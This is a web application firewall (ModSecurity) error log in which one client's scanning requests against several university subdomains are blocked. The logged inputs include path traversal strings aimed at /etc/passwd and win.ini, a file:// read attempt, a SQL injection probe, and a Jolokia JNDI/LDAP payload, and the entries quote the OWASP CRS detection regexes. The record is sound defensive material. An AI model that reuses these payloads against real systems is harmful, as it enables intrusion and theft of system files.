[Tue Aug 29 11:44:59.457301 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13y8Co-f0AAAheaXcAAAAY"]
[Tue Aug 29 11:45:00.422602 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAg-pMwAAAAR"]
[Tue Aug 29 11:45:00.726644 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAfSWiMAAAAB"]
[Tue Aug 29 11:45:00.779311 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhoHK8AAAAl"]
[Tue Aug 29 11:45:00.853964 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhuiwsAAAAr"]
[Tue Aug 29 11:45:00.863169 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAhxwkcAAAAv"]
[Tue Aug 29 11:45:00.883196 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAh13tYAAAAz"]
[Tue Aug 29 11:45:01.058237 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAARphJcAAAAU"]
[Tue Aug 29 11:45:01.076982 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zcCo-f0AAAh13tcAAAAz"]
[Tue Aug 29 11:45:01.120145 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAg-pM8AAAAR"]
[Tue Aug 29 11:45:01.367468 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAh4DWoAAAA2"]
[Tue Aug 29 11:45:01.376986 2023] [:error] [pid 2151] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAhnIh8AAAAk"]
[Tue Aug 29 11:45:01.381905 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zcCo-f0AAAfbku4AAAAZ"]
[Tue Aug 29 11:45:02.361247 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAfGag8AAAAT"]
[Tue Aug 29 11:45:02.424858 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhzvaIAAAAx"]
[Tue Aug 29 11:45:02.431075 2023] [:error] [pid 2166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAh2H2QAAAA0"]
[Tue Aug 29 11:45:02.432705 2023] [:error] [pid 2162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhyKWAAAAAw"]
[Tue Aug 29 11:45:02.439180 2023] [:error] [pid 2151] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhnIiEAAAAk"]
[Tue Aug 29 11:45:02.441935 2023] [:error] [pid 2143] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhfdnsAAAAa"]
[Tue Aug 29 11:45:02.443477 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhtjbkAAAAq"]
[Tue Aug 29 11:45:02.444380 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAfGahAAAAAT"]
[Tue Aug 29 11:45:03.370837 2023] [:error] [pid 2162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhyKWEAAAAw"]
[Tue Aug 29 11:45:03.393638 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAfg76gAAAAe"]
[Tue Aug 29 11:45:03.399972 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAg4DecAAAAI"]
[Tue Aug 29 11:45:04.386329 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAg4DekAAAAI"]
[Tue Aug 29 11:45:04.425503 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAdxUkAAAAAC"]
[Tue Aug 29 11:45:05.353126 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAdOehUAAAAS"]
[Tue Aug 29 11:45:05.358895 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAfbkvUAAAAZ"]
[Tue Aug 29 11:45:05.360720 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAfg76sAAAAe"]
[Tue Aug 29 11:45:05.366415 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAfiYtQAAAAg"]
[Tue Aug 29 11:45:05.379136 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAg-pNYAAAAR"]
[Tue Aug 29 11:45:05.379570 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAfbkvYAAAAZ"]
[Tue Aug 29 11:45:05.380387 2023] [:error] [pid 2107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAg7zHIAAAAJ"]
[Tue Aug 29 11:45:05.382247 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAh6rJYAAAA4"]
[Tue Aug 29 11:45:05.395399 2023] [:error] [pid 2160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhwxlgAAAAt"]
[Tue Aug 29 11:45:05.395958 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhlz3kAAAAi"]
[Tue Aug 29 11:45:06.363822 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAh6rJcAAAA4"]
[Tue Aug 29 11:45:06.365509 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] 